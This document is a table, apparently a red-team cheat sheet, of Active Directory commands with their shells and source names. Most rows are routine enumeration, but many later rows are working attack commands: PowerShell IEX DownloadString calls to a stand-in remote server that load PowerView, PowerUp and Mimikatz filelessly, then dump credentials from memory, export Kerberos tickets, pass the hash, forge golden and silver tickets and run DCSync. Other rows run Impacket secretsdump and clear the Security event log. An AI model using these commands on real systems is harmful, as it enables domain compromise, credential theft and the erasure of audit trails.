| Collect Domain SID |
Get-ADDomain | Select-Object SID |
PowerShell |
Microsoft Documentation |
| List Domain Controllers |
nltest /dclist:domain |
CMD |
Microsoft Documentation |
| Enumerate Domain Groups |
Get-ADGroup -Filter * | Select-Object Name |
PowerShell |
Microsoft Documentation |
| Check AD Replication Status |
repadmin /replsummary |
CMD |
Microsoft Documentation |
| Enumerate Domain Users |
Get-ADUser -Filter * | Select-Object Name, SamAccountName |
PowerShell |
AD Exploitation Cheat Sheet |
| Get Domain Password Policy |
Get-ADDefaultDomainPasswordPolicy |
PowerShell |
PowerShell Red Team |
| Identify Members of Domain Admins |
Get-ADGroupMember -Identity "Domain Admins" |
PowerShell |
Microsoft Documentation |
| Check Kerberos Ticket Policy |
Get-ADDefaultDomainPasswordPolicy | Select-Object -ExpandProperty KerberosTicketPolicy |
PowerShell |
AD Exploitation Cheat Sheet |
| List All Organizational Units (OUs) |
Get-ADOrganizationalUnit -Filter * |
PowerShell |
Microsoft Documentation |
| Identify Users with Delegation Privileges |
Get-ADUser -Filter {TrustedForDelegation -eq $true} |
PowerShell |
PowerShell Red Team |
| List AD Users with Details |
Get-ADUser -Filter * -Properties DisplayName, EmailAddress, LastLogonDate |
PowerShell |
Microsoft Documentation |
| Identify Accounts with SPNs (Kerberoasting) |
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
PowerShell |
AD Exploitation Cheat Sheet |
| Find Admin Accounts |
dsquery user -name *admin* |
CMD |
HackTricks - AD Methodology |
| List all Domain Computers |
Get-ADComputer -Filter * | Select-Object Name, OperatingSystem |
PowerShell |
Medium - AD Enumeration |
| Check Group Policy Objects (GPOs) |
Get-GPO -All |
PowerShell |
Active Directory Pro |
| List Privileged Groups |
net group "Domain Admins" /domain |
CMD |
HackTheBox - AD Pentesting Guide |
| Find Machines with Unconstrained Delegation |
Get-ADComputer -Filter {TrustedForDelegation -eq $true} |
PowerShell |
PowerShell Red Team |
| Check User Account Lockout Status |
Get-ADUser -Filter * -Properties LockedOut | Where-Object {$_.LockedOut -eq $true} |
PowerShell |
Exploit-DB - AD Enumeration Guide |
| Identify Expired Passwords |
Search-ADAccount -PasswordExpired | Select-Object Name, PasswordExpired |
PowerShell |
Pentest Everything - AD Enumeration |
| Query all Domain Services |
nltest /dsgetdc:domain |
CMD |
Medium - AD Enumeration with PowerShell |
| Enumerate Trusted Domains |
nltest /trusted_domains |
CMD |
GitHub - AD Pentest |
| List AD Sites |
Get-ADReplicationSite -Filter * |
PowerShell |
Microsoft Documentation |
| Get Domain Forest Information |
Get-ADForest |
PowerShell |
CBT Nuggets - Common AD Commands |
| Find SID History for Users (SID History Abuse) |
Get-ADUser -Filter * -Properties SIDHistory | Where-Object {$_.SIDHistory} |
PowerShell |
AD Exploitation Cheat Sheet |
| Check Domain Controller Certificates |
certutil -dcinfo verify |
CMD |
PowerShell Red Team |
| Import PowerView Module |
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerView.ps1'); Get-NetUser" |
PowerShell |
PowerSploit - PowerView |
| Import PowerUp Module |
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerUp.ps1'); Invoke-AllChecks" |
PowerShell |
PowerSploit - PowerUp |
| Find Domain Admins with PowerView |
Get-NetGroup -GroupName "Domain Admins" | Get-NetGroupMember |
PowerShell (PowerView) |
PowerSploit - PowerView |
| List All Domains with PowerView |
Get-NetDomain |
PowerShell (PowerView) |
HackTricks - AD Methodology |
| Enumerate Domain Trusts with PowerView |
Get-NetDomainTrust |
PowerShell (PowerView) |
Medium - AD Enumeration |
| Find Local Privilege Escalation Paths with PowerUp |
Invoke-AllChecks |
PowerShell (PowerUp) |
PowerSploit - PowerUp |
| Identify Local Administrators with PowerUp |
Get-LocalGroupMember -Group "Administrators" |
PowerShell |
PowerSploit - PowerUp |
| Search for Kerberoastable Accounts with PowerView |
Get-NetUser -SPN | Select-Object servicePrincipalName |
PowerShell (PowerView) |
PowerSploit - PowerView |
| List All Sessions on Domain Machines with PowerView |
Get-NetSession -ComputerName target-machine |
PowerShell (PowerView) |
Pentest Everything - AD Enumeration |
| Enumerate Local Admins on All Domain Machines with PowerView |
Invoke-EnumerateLocalAdmin -ComputerName target-machine |
PowerShell (PowerView) |
PowerSploit - PowerView |
| Find Weak File Permissions with PowerUp |
Invoke-CheckLocalAdminAccess |
PowerShell (PowerUp) |
PowerSploit - PowerUp |
| Check Writable Registry Paths with PowerUp |
Invoke-AllChecks | Select-Object WritableRegPaths |
PowerShell (PowerUp) |
PowerSploit - PowerUp |
| Dump Domain Hashes with SecretsDump |
secretsdump.py domain/username:password@target |
Python (Impacket) |
Impacket - SecretsDump |
| Check Domain Policies with PowerView |
Get-DomainPolicy |
PowerShell (PowerView) |
PowerSploit - PowerView |
| Identify Interesting ACLs with PowerView |
Find-InterestingDomainAcl |
PowerShell (PowerView) |
PowerSploit - PowerView |
| Enumerate Domain Users (LDAP) |
dsquery user -name * |
CMD |
Active Directory Pro |
| Get Domain Information |
Get-ADDomain |
PowerShell |
Microsoft Documentation |
| Enumerate Domain Forest |
Get-ADForest |
PowerShell |
Microsoft Documentation |
| List All Users in the Domain |
net user /domain |
CMD |
Active Directory Pro |
| Get Domain Functional Level |
Get-ADDomain | Select-Object DomainMode |
PowerShell |
HackTricks - AD Methodology |
| List Domain Groups |
Get-ADGroup -Filter * | Select-Object Name |
PowerShell |
Medium - AD Enumeration |
| Query Domain Controllers in Domain |
nltest /dclist:domain |
CMD |
Microsoft Documentation |
| Find DC Site Information |
nltest /dsgetsite |
CMD |
Microsoft Documentation |
| List All Computers in Domain |
Get-ADComputer -Filter * |
PowerShell |
Active Directory Pro |
| Get All Subnets in the Forest |
Get-ADReplicationSubnet -Filter * |
PowerShell |
Microsoft Documentation |
| Check LDAP Server Status |
nltest /dsgetdc:domain /ldaponly |
CMD |
Microsoft Documentation |
| Get AD DNS Zone Information |
Get-DnsServerZone |
PowerShell |
Microsoft Documentation |
| Check Domain Group Membership |
net group "GroupName" /domain |
CMD |
CBT Nuggets - AD Commands |
| Get Domain Users Last Logon Time |
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate |
PowerShell |
Medium - AD Enumeration |
| List all Service Accounts |
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select Name, ServicePrincipalName |
PowerShell |
Pentest Everything - AD Enumeration |
| Get Password Policy of Domain |
Get-ADDefaultDomainPasswordPolicy |
PowerShell |
Active Directory Pro |
| List Open File Shares on Domain Machines |
net view \\target-machine |
CMD |
Exploit-DB - AD Enumeration |
| Find Active Directory Sites |
Get-ADReplicationSite -Filter * |
PowerShell |
Microsoft Documentation |
| List Organizational Units (OUs) |
Get-ADOrganizationalUnit -Filter * |
PowerShell |
Microsoft Documentation |
| Check Group Policy for Computer |
gpresult /r /scope computer |
CMD |
Microsoft Documentation |
| Query DNS Servers in Domain |
Get-DnsServerResourceRecord -ZoneName "domain.local" |
PowerShell |
Microsoft Documentation |
| Enumerate Global Catalog Servers |
nltest /dsgetdc:/gc |
CMD |
Microsoft Documentation |
| Get Domain Password Expiration Policy |
net accounts /domain |
CMD |
HackTheBox - AD Pentesting Guide |
| Get Domain Controllers |
Get-ADDomainController -Filter * |
PowerShell |
Microsoft Documentation |
| Enumerate All Organizational Units (OUs) |
Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName |
PowerShell |
Microsoft Documentation |
| List Users in Specific Group |
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName |
PowerShell |
AD Exploitation Cheat Sheet |
| Check Last Logon Time for All Users |
Get-ADUser -Filter * -Properties LastLogonDate | Where-Object {$_.LastLogonDate -ne $null} | Select-Object Name, LastLogonDate |
PowerShell |
Active Directory Pro |
| List Active Directory Sites |
Get-ADReplicationSite -Filter * |
PowerShell |
Microsoft Documentation |
| Find Local Administrators on a Machine |
net localgroup Administrators |
CMD |
Microsoft Documentation |
| Get Domain Users with Expired Passwords |
Search-ADAccount -PasswordExpired | Select-Object Name, PasswordExpired |
PowerShell |
HackTheBox - AD Pentesting Guide |
| Query Domain Forest Global Catalog |
nltest /gc |
CMD |
Microsoft Documentation |
| Check Domain Admin Account Status |
Get-ADUser -Filter {MemberOf -RecursiveMatch 'Domain Admins'} | Select-Object Name, Enabled |
PowerShell |
Pentest Everything - AD Enumeration |
| List Privileged Accounts in Domain |
Get-ADUser -Filter {AdminCount -eq 1} | Select-Object Name, SamAccountName |
PowerShell |
Medium - AD Enumeration |
| Enumerate Group Policy Objects (GPO) |
Get-GPO -All | Select-Object DisplayName, GpoStatus |
PowerShell |
PowerShell Red Team |
| Identify Computers with Unconstrained Delegation |
Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select-Object Name, DNSHostName |
PowerShell |
PowerSploit - PowerView |
| List All Domain Groups and Their Members |
Get-ADGroup -Filter * | ForEach-Object {Get-ADGroupMember -Identity $_.Name | Select Name, SamAccountName} |
PowerShell |
AD Exploitation Cheat Sheet |
| Find Domain Password Policy Settings |
net accounts /domain |
CMD |
Active Directory Pro |
| List Service Principal Names (SPNs) |
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName |
PowerShell |
HackTricks - AD Methodology |
| Enumerate DNS Servers |
Get-DnsServer | Select-Object Name, IPAddress |
PowerShell |
Microsoft Documentation |
| List Delegated Admins on Specific OU |
Get-ACL "OU=TestOU,DC=domain,DC=com" | Format-List |
PowerShell |
Medium - AD Enumeration |
| Identify Expired Accounts |
Search-ADAccount -AccountExpired | Select-Object Name, Enabled |
PowerShell |
AD Exploitation Cheat Sheet |
| Check Domain Controller Synchronization Status |
repadmin /showrepl |
CMD |
Microsoft Documentation |
| Find Computers with LAPS Enabled |
Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=com" |
PowerShell |
Microsoft Documentation |
| View All Replication Subnets |
Get-ADReplicationSubnet -Filter * |
PowerShell |
Microsoft Documentation |
| List Machines with High Privileges |
Get-ADComputer -Filter {PrimaryGroupID -eq 512} |
PowerShell |
Medium - AD Enumeration |
| Get AD Domain Sites and Subnets |
Get-ADReplicationSite | Select-Object Name, SiteObjectGUID |
PowerShell |
Microsoft Documentation |
| Enumerate Password Policies |
Get-ADFineGrainedPasswordPolicy |
PowerShell |
Microsoft Documentation |
| Find High-Value Targets (e.g., Admins with SPN) |
Get-ADUser -Filter {ServicePrincipalName -ne "$null" -and MemberOf -like "*Domain Admins*"} | Select Name, ServicePrincipalName |
PowerShell |
AD Exploitation Cheat Sheet |
| List All Domain Groups and Membership Counts |
Get-ADGroup -Filter * | ForEach-Object {Write-Output "$($_.Name): $((Get-ADGroupMember -Identity $_.Name).Count)"} |
PowerShell |
Active Directory Pro |
| Find Sensitive Account Delegations |
Get-ADUser -Filter {TrustedForDelegation -eq $true} | Select-Object Name, SamAccountName |
PowerShell |
HackTricks - AD Methodology |
| Enumerate Domain Admins |
Get-ADGroupMember -Identity "Domain Admins" | Select Name, SamAccountName, ObjectClass |
PowerShell |
AD Exploitation Cheat Sheet |
| Check for Kerberos Pre-Authentication Disabled Accounts |
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName |
PowerShell |
Microsoft Documentation |
| Find All Sessions on a Computer |
quser /server:ComputerName |
CMD |
Quser Command |
| Identify all GPO Permissions for a User |
Get-GPPermission -All -User "UserName" | Select-Object DisplayName, Permission |
PowerShell |
Microsoft Documentation |
| Enumerate All Forest Trusts |
Get-ADTrust -Filter * |
PowerShell |
Microsoft Documentation |
| List Open Shares on Remote Computer |
net view \\ComputerName /all |
CMD |
Net View Command |
| Check if Machine is a Domain Controller |
if ((Get-ADComputer -Identity "ComputerName").PrimaryGroupID -eq 516) { "Domain Controller" } |
PowerShell |
Microsoft Documentation |
| List All Members of a Specific OU |
Get-ADUser -SearchBase "OU=Users,DC=domain,DC=com" -Filter * | Select Name, SamAccountName |
PowerShell |
Active Directory Pro |
| Identify Admin Accounts with Password Never Expire |
Get-ADUser -Filter {PasswordNeverExpires -eq $true -and AdminCount -eq 1} | Select-Object Name |
PowerShell |
HackTricks - AD Methodology |
| Get LAPS-Enabled Computers |
Find-AdmPwdExtendedRights -Identity "OU=Computers,DC=domain,DC=com" |
PowerShell (LAPS) |
Microsoft Documentation |
| Check Active Directory Replication Queue |
repadmin /queue |
CMD |
Microsoft Documentation |
| List All Kerberos Tickets in Cache |
klist |
CMD |
Klist Command |
| Find Users with Expired Passwords |
Search-ADAccount -PasswordExpired | Select-Object Name, SamAccountName |
PowerShell |
Microsoft Documentation |
| List All Disabled Accounts in Domain |
Search-ADAccount -AccountDisabled | Select-Object Name, SamAccountName |
PowerShell |
Microsoft Documentation |
| List Privileges for a Specific Group |
Get-ADGroupMember -Identity "Enterprise Admins" | Select Name, SamAccountName |
PowerShell |
Microsoft Documentation |
| List Sessions on a Domain Controller |
qwinsta /server:DomainControllerName |
CMD |
Qwinsta Command |
| Check Domain Controllers Replication Status |
Get-ADReplicationPartnerMetadata -Target "DC=domain,DC=com" |
PowerShell |
Microsoft Documentation |
| List Local Administrators on Remote System |
net localgroup Administrators /domain |
CMD |
Net Localgroup Command |
| Run Mimikatz as Admin (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords' |
PowerShell (Fileless) |
Mimikatz Cheat Sheet |
| Dump Credentials from Memory (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords' |
PowerShell (Fileless) |
Comprehensive Mimikatz Guide |
| Extract Kerberos Ticket (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::list /export' |
PowerShell (Fileless) |
ADSecurity - Mimikatz |
| Pass-the-Hash Attack (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::pth /user:UserName /domain:domain.local /ntlm:hash /run:powershell.exe' |
PowerShell (Fileless) |
AkimboCore - Mimikatz |
| Enumerate All Registry Keys |
reg query HKLM |
CMD |
SS64 - Reg Command |
| Check AutoStart Programs |
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run |
CMD |
HackTricks - Registry Persistence |
| Modify Registry Key Permissions |
reg add HKLM\Software\ExampleKey /v ExampleValue /t REG_SZ /d "ExampleData" /f |
CMD |
SS64 - Reg Add Command |
| Export Registry Hive |
reg export HKLM\Software\MyKey mykey.reg |
CMD |
SS64 - Reg Export Command |
| Force Group Policy Update |
gpupdate /force |
CMD |
SS64 - Gpupdate Command |
| List Applied GPOs for Computer |
gpresult /R /SCOPE COMPUTER |
CMD |
SS64 - Gpresult Command |
| Enumerate All GPOs Linked to OU |
Get-GPLink -Domain domain.local -Target "OU=ExampleOU,DC=domain,DC=local" |
PowerShell |
Microsoft Documentation |
| List All Group Policies in Domain |
Get-GPO -All |
PowerShell |
Microsoft Documentation |
| Find Local Admins on Remote Machine |
net localgroup Administrators /domain |
CMD |
SS64 - Net Localgroup Command |
| View Security Event Logs |
Get-EventLog -LogName Security -Newest 100 |
PowerShell |
Microsoft Documentation |
| Clear Security Event Logs |
Clear-EventLog -LogName Security |
PowerShell |
Microsoft Documentation |
| Enable Remote Desktop (RDP) |
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
CMD |
HackTricks - Enable RDP |
| Golden Ticket Attack (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21- /krbtgt: /id:500'
Load the ticket in session:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
|
PowerShell (Fileless) |
HackTricks - Golden Ticket |
| Silver Ticket Attack (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:UserName /domain:domain.local /sid:S-1-5-21- /target:ServerName /rc4: /service:cifs /id:500'
Load the ticket in session:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
|
PowerShell (Fileless) |
ADSecurity - Silver Ticket |
| Pass-the-Ticket Attack (Fileless) |
Dump Kerberos tickets in memory:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::tickets'
Use a specific Kerberos ticket:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
|
PowerShell (Fileless) |
Mimikatz Cheat Sheet - Pass-the-Ticket |
| Dump Cached Domain Credentials (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords' (Requires elevated privileges) |
PowerShell (Fileless) |
Comprehensive Mimikatz Guide |
| Dump Domain Credentials using DCSync (Fileless) |
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'lsadump::dcsync /domain:domain.local /user:Administrator' |
PowerShell (Fileless) |
ADSecurity - DCSync Attack |
| Enable Remote Desktop (RDP) |
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
CMD |
HackTricks - Enable RDP |
| Check Registry Keys for Persistence |
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run |
CMD |
SS64 - Reg Command |
| List User Rights Assignments |
Get-GPResultantSetOfPolicy -User domain\username -ReportType Html -Path C:\gporeport.html |
PowerShell |
Microsoft Documentation |
| Export All Group Policy Objects |
Backup-GPO -All -Path "C:\GPOBackups" |
PowerShell |
Microsoft Documentation |
| Pass-the-Hash Attack on Local Account |
sekurlsa::pth /user:LocalUser /domain:localhost /ntlm: /run:powershell.exe |
Mimikatz |
HackTricks - Pass-the-Hash |
| Query Active Directory Replication Partners |
repadmin /showrepl |
CMD |
Microsoft Documentation |
| List All Active Directory Sites |
Get-ADReplicationSite -Filter * |
PowerShell |
Microsoft Documentation |
| Identify Domain Admins Group Members |
Get-ADGroupMember -Identity "Domain Admins" |
PowerShell |
Microsoft Documentation |
